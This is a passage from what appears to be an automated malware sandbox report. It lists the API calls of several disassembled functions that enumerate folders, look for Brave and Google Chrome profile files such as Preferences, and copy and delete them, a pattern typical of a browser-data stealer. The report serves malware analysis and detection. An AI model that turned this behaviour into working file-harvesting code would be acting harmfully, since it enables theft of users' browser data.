                                  • lstrcat.KERNEL32(00000000), ref: 002B1776
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002B17A2
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002B17EF
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002B17F9
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002B1825
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002B1875
                                  • lstrcat.KERNEL32(00000000), ref: 002B187F
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002B18AB
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002B18F3
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002B18FE
                                  • lstrlen.KERNEL32(002E1794), ref: 002B1909
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002B1929
                                  • lstrcat.KERNEL32(00000000,002E1794), ref: 002B1935
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002B195B
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002B1966
                                  • lstrlen.KERNEL32(\*.*), ref: 002B1971
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002B198E
                                  • lstrcat.KERNEL32(00000000,\*.*), ref: 002B199A
                                    • Part of subcall function 002D4040: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 002D406D
                                    • Part of subcall function 002D4040: lstrcpy.KERNEL32(00000000,?), ref: 002D40A2
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002B19C3
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002B1A0E
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002B1A16
                                  • lstrlen.KERNEL32(002E1794), ref: 002B1A21
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002B1A41
                                  • lstrcat.KERNEL32(00000000,002E1794), ref: 002B1A4D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002B1A76
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002B1A81
                                  • lstrlen.KERNEL32(002E1794), ref: 002B1A8C
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002B1AAC
                                  • lstrcat.KERNEL32(00000000,002E1794), ref: 002B1AB8
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002B1ADE
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002B1AE9
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002B1B11
                                  • FindFirstFileA.KERNEL32(00000000,?), ref: 002B1B45
                                  • StrCmpCA.SHLWAPI(?,002E17A0), ref: 002B1B70
                                  • StrCmpCA.SHLWAPI(?,002E17A4), ref: 002B1B8A
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002B1BC4
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002B1BFB
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002B1C03
                                  • lstrlen.KERNEL32(002E1794), ref: 002B1C0E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002B1C31
                                  • lstrcat.KERNEL32(00000000,002E1794), ref: 002B1C3D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002B1C69
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002B1C74
                                  • lstrlen.KERNEL32(002E1794), ref: 002B1C7F
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002B1CA2
                                  • lstrcat.KERNEL32(00000000,002E1794), ref: 002B1CAE
                                  • lstrlen.KERNEL32(?), ref: 002B1CBB
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002B1CDB
                                  • lstrcat.KERNEL32(00000000,?), ref: 002B1CE9
                                  • lstrlen.KERNEL32(002E1794), ref: 002B1CF4
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002B1D14
                                  • lstrcat.KERNEL32(00000000,002E1794), ref: 002B1D20
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002B1D46
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002B1D51
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002B1D7D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002B1DE0
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002B1DEB
                                  • lstrlen.KERNEL32(002E1794), ref: 002B1DF6
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002B1E19
                                  • lstrcat.KERNEL32(00000000,002E1794), ref: 002B1E25
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002B1E4B
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002B1E56
                                  • lstrlen.KERNEL32(002E1794), ref: 002B1E61
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002B1E81
                                  • lstrcat.KERNEL32(00000000,002E1794), ref: 002B1E8D
                                  • lstrlen.KERNEL32(?), ref: 002B1E9A
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002B1EBA
                                  • lstrcat.KERNEL32(00000000,?), ref: 002B1EC8
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002B1EF4
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002B1F3E
                                  • GetFileAttributesA.KERNEL32(00000000), ref: 002B1F45
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002B1F9F
                                  • lstrlen.KERNEL32(011C9248), ref: 002B1FAE
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002B1FDB
                                  • lstrcat.KERNEL32(00000000,?), ref: 002B1FE3
                                  • lstrlen.KERNEL32(002E1794), ref: 002B1FEE
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002B200E
                                  • lstrcat.KERNEL32(00000000,002E1794), ref: 002B201A
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002B2042
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002B204D
                                  • lstrlen.KERNEL32(002E1794), ref: 002B2058
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002B2075
                                  • lstrcat.KERNEL32(00000000,002E1794), ref: 002B2081
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$lstrlen$File$AttributesFindFirstFolderPath
                                  • String ID: \*.*
                                  • API String ID: 4127656590-1173974218
                                  • Opcode ID: 6ce12aaa590bc3b7df69fe083ffda2fff033bbb0c56fab1b0f34e460239dfdef
                                  • Instruction ID: d138ae65bd35b6d9eb91e7e089fd7da2dad81fa1ad2370b50f5d9b9f87c21ea9
                                  • Opcode Fuzzy Hash: 6ce12aaa590bc3b7df69fe083ffda2fff033bbb0c56fab1b0f34e460239dfdef
                                  • Instruction Fuzzy Hash: FB92AF31921747DBDB21EF64DD88AEEB7B9AF44380F544024F849A7252DB30DD29CBA0
                                  Function 002BDB80 Relevance: 176.2, APIs: 96, Strings: 4, Instructions: 1193stringfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002BDBC1
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002BDBE4
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002BDBEF
                                  • lstrlen.KERNEL32(002E4CA8), ref: 002BDBFA
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002BDC17
                                  • lstrcat.KERNEL32(00000000,002E4CA8), ref: 002BDC23
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002BDC4C
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002BDC8F
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002BDCBF
                                  • FindFirstFileA.KERNEL32(00000000,?), ref: 002BDCD0
                                  • StrCmpCA.SHLWAPI(?,002E17A0), ref: 002BDCF0
                                  • StrCmpCA.SHLWAPI(?,002E17A4), ref: 002BDD0A
                                  • lstrlen.KERNEL32(002DCFEC), ref: 002BDD1D
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002BDD47
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002BDD70
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002BDD7B
                                  • lstrlen.KERNEL32(002E1794), ref: 002BDD86
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002BDDA3
                                  • lstrcat.KERNEL32(00000000,002E1794), ref: 002BDDAF
                                  • lstrlen.KERNEL32(?), ref: 002BDDBC
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002BDDDF
                                  • lstrcat.KERNEL32(00000000,?), ref: 002BDDED
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002BDE19
                                  • lstrlen.KERNEL32(002E1794), ref: 002BDE3D
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002BDE6F
                                  • lstrcat.KERNEL32(00000000,002E1794), ref: 002BDE7B
                                  • lstrlen.KERNEL32(011C90F8), ref: 002BDE8A
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002BDEB0
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002BDEBB
                                  • lstrlen.KERNEL32(002E1794), ref: 002BDEC6
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002BDEE6
                                  • lstrcat.KERNEL32(00000000,002E1794), ref: 002BDEF2
                                  • lstrlen.KERNEL32(011C9228), ref: 002BDF01
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002BDF27
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002BDF32
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002BDF5E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002BDFA5
                                  • lstrcat.KERNEL32(00000000,002E1794), ref: 002BDFB1
                                  • lstrlen.KERNEL32(011C90F8), ref: 002BDFC0
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002BDFE9
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002BDFF4
                                  • lstrlen.KERNEL32(002E1794), ref: 002BDFFF
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002BE022
                                  • lstrcat.KERNEL32(00000000,002E1794), ref: 002BE02E
                                  • lstrlen.KERNEL32(011C9228), ref: 002BE03D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002BE063
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002BE06E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002BE09A
                                  • StrCmpCA.SHLWAPI(?,Brave), ref: 002BE0CD
                                  • StrCmpCA.SHLWAPI(?,Preferences), ref: 002BE0E7
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002BE11F
                                  • lstrlen.KERNEL32(011CD688), ref: 002BE12E
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002BE155
                                  • lstrcat.KERNEL32(00000000,?), ref: 002BE15D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002BE19F
                                  • lstrcat.KERNEL32(00000000), ref: 002BE1A9
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002BE1D0
                                  • CopyFileA.KERNEL32(00000000,?,00000001), ref: 002BE1F9
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002BE22F
                                  • lstrlen.KERNEL32(011C9248), ref: 002BE23D
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002BE261
                                  • lstrcat.KERNEL32(00000000,011C9248), ref: 002BE269
                                  • lstrlen.KERNEL32(\Brave\Preferences), ref: 002BE274
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002BE29B
                                  • lstrcat.KERNEL32(00000000,\Brave\Preferences), ref: 002BE2A7
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002BE2CF
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002BE30F
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002BE349
                                  • DeleteFileA.KERNEL32(?), ref: 002BE381
                                  • StrCmpCA.SHLWAPI(?,011CD508), ref: 002BE3AB
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002BE3F4
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002BE41C
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002BE445
                                  • StrCmpCA.SHLWAPI(?,011C9228), ref: 002BE468
                                  • StrCmpCA.SHLWAPI(?,011C90F8), ref: 002BE47D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002BE4D9
                                  • GetFileAttributesA.KERNEL32(00000000), ref: 002BE4E0
                                  • StrCmpCA.SHLWAPI(?,011CD628), ref: 002BE58E
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002BE5C4
                                  • CopyFileA.KERNEL32(00000000,?,00000001), ref: 002BE639
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002BE678
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002BE6A1
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002BE6C7
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002BE70E
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002BE737
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002BE75C
                                  • StrCmpCA.SHLWAPI(?,Google Chrome), ref: 002BE776
                                  • DeleteFileA.KERNEL32(?), ref: 002BE7D2
                                  • StrCmpCA.SHLWAPI(?,011C9198), ref: 002BE7FC
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002BE88C
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002BE8B5
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002BE8EE
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002BE916
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002BE952
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$lstrlen$File$CopyDelete$AttributesFindFirst
                                  • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                  • API String ID: 2635522530-726946144
                                  • Opcode ID: 0a79d405651ac389ccba9d275df127ed4edb0c495238cd8e2d8eea34c91053a7
                                  • Instruction ID: 917033db0e2efa3c902cf58b197372876aadf6790b0e40342a3acae308b3db7a
                                  • Opcode Fuzzy Hash: 0a79d405651ac389ccba9d275df127ed4edb0c495238cd8e2d8eea34c91053a7
                                  • Instruction Fuzzy Hash: C892AE719202469BDF20EF74DC89AEE77B9AF44380F554428F84AA7251DB34EC69CF90
                                  Function 002C18A0 Relevance: 156.7, APIs: 88, Strings: 1, Instructions: 909stringfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002C18D2
                                  • lstrlen.KERNEL32(\*.*), ref: 002C18DD
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002C18FF
                                  • lstrcat.KERNEL32(00000000,\*.*), ref: 002C190B
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C1932
                                  • FindFirstFileA.KERNEL32(00000000,?), ref: 002C1947
                                  • StrCmpCA.SHLWAPI(?,002E17A0), ref: 002C1967
                                  • StrCmpCA.SHLWAPI(?,002E17A4), ref: 002C1981
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002C19BF
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002C19F2
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002C1A1A
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002C1A25
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C1A4C
                                  • lstrlen.KERNEL32(002E1794), ref: 002C1A5E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C1A80
                                  • lstrcat.KERNEL32(00000000,002E1794), ref: 002C1A8C
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C1AB4
                                  • lstrlen.KERNEL32(?), ref: 002C1AC8
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C1AE5
                                  • lstrcat.KERNEL32(00000000,?), ref: 002C1AF3
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C1B19
                                  • lstrlen.KERNEL32(011C9238), ref: 002C1B2F
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C1B59
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002C1B64
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C1B8F
                                  • lstrlen.KERNEL32(002E1794), ref: 002C1BA1
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C1BC3
                                  • lstrcat.KERNEL32(00000000,002E1794), ref: 002C1BCF
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C1BF8
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C1C25
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002C1C30
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C1C57
                                  • lstrlen.KERNEL32(002E1794), ref: 002C1C69
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C1C8B
                                  • lstrcat.KERNEL32(00000000,002E1794), ref: 002C1C97
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C1CC0
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C1CEF
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002C1CFA
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C1D21
                                  • lstrlen.KERNEL32(002E1794), ref: 002C1D33
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C1D55
                                  • lstrcat.KERNEL32(00000000,002E1794), ref: 002C1D61
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C1D8A
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C1DB9
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002C1DC4
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C1DED
                                  • lstrlen.KERNEL32(002E1794), ref: 002C1E19
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C1E36
                                  • lstrcat.KERNEL32(00000000,002E1794), ref: 002C1E42
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C1E68
                                  • lstrlen.KERNEL32(011CD640), ref: 002C1E7E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C1EB2
                                  • lstrlen.KERNEL32(002E1794), ref: 002C1EC6
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C1EE3
                                  • lstrcat.KERNEL32(00000000,002E1794), ref: 002C1EEF
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C1F15
                                  • lstrlen.KERNEL32(011CD730), ref: 002C1F2B
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C1F5F
                                  • lstrlen.KERNEL32(002E1794), ref: 002C1F73
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C1F90
                                  • lstrcat.KERNEL32(00000000,002E1794), ref: 002C1F9C
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C1FC2
                                  • lstrlen.KERNEL32(011BB6D0), ref: 002C1FD8
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C2000
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002C200B
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C2036
                                  • lstrlen.KERNEL32(002E1794), ref: 002C2048
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C2067
                                  • lstrcat.KERNEL32(00000000,002E1794), ref: 002C2073
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C2098
                                  • lstrlen.KERNEL32(?), ref: 002C20AC
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C20D0
                                  • lstrcat.KERNEL32(00000000,?), ref: 002C20DE
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C2103
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002C213F
                                  • lstrlen.KERNEL32(011CD688), ref: 002C214E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C2176
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002C2181
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$lstrlen$FileFindFirst
                                  • String ID: \*.*
                                  • API String ID: 712834838-1173974218
                                  • Opcode ID: 54a3330b3f5225888a0a77cd07e99b6c0a6538b6636d8c2def04cc913c5fe642
                                  • Instruction ID: 7c2c83460b516c97fe00673c6900821a3c0a776d7f35a69dfde543563aee61b6
                                  • Opcode Fuzzy Hash: 54a3330b3f5225888a0a77cd07e99b6c0a6538b6636d8c2def04cc913c5fe642
                                  • Instruction Fuzzy Hash: D362AF30921657DBDB21EF64CD89FBEB7B9AF41740F144228B849A7252DB30DD29CB90
                                  Function 002C3910 Relevance: 144.4, APIs: 81, Strings: 1, Instructions: 869stringfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • wsprintfA.USER32 ref: 002C392C
                                  • FindFirstFileA.KERNEL32(?,?), ref: 002C3943
                                  • StrCmpCA.SHLWAPI(?,002E17A0), ref: 002C396C
                                  • StrCmpCA.SHLWAPI(?,002E17A4), ref: 002C3986
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002C39BF
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002C39E7
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002C39F2
                                  • lstrlen.KERNEL32(002E1794), ref: 002C39FD
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C3A1A
                                  • lstrcat.KERNEL32(00000000,002E1794), ref: 002C3A26
                                  • lstrlen.KERNEL32(?), ref: 002C3A33
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C3A53
                                  • lstrcat.KERNEL32(00000000,?), ref: 002C3A61
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C3A8A
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002C3ACE
                                  • lstrlen.KERNEL32(?), ref: 002C3AD8
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C3B05
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002C3B10
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C3B36
                                  • lstrlen.KERNEL32(002E1794), ref: 002C3B48
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C3B6A
                                  • lstrcat.KERNEL32(00000000,002E1794), ref: 002C3B76
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C3B9E
                                  • lstrlen.KERNEL32(?), ref: 002C3BB2
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C3BD2
                                  • lstrcat.KERNEL32(00000000,?), ref: 002C3BE0
                                  • lstrlen.KERNEL32(011C9248), ref: 002C3C0B
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C3C31
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002C3C3C
                                  • lstrlen.KERNEL32(011C9238), ref: 002C3C5E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C3C84
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002C3C8F
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C3CB7
                                  • lstrlen.KERNEL32(002E1794), ref: 002C3CC9
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C3CE8
                                  • lstrcat.KERNEL32(00000000,002E1794), ref: 002C3CF4
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C3D1A
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002C3D47
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002C3D52
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C3D79
                                  • lstrlen.KERNEL32(002E1794), ref: 002C3D8B
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C3DAD
                                  • lstrcat.KERNEL32(00000000,002E1794), ref: 002C3DB9
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C3DE2
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C3E11
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002C3E1C
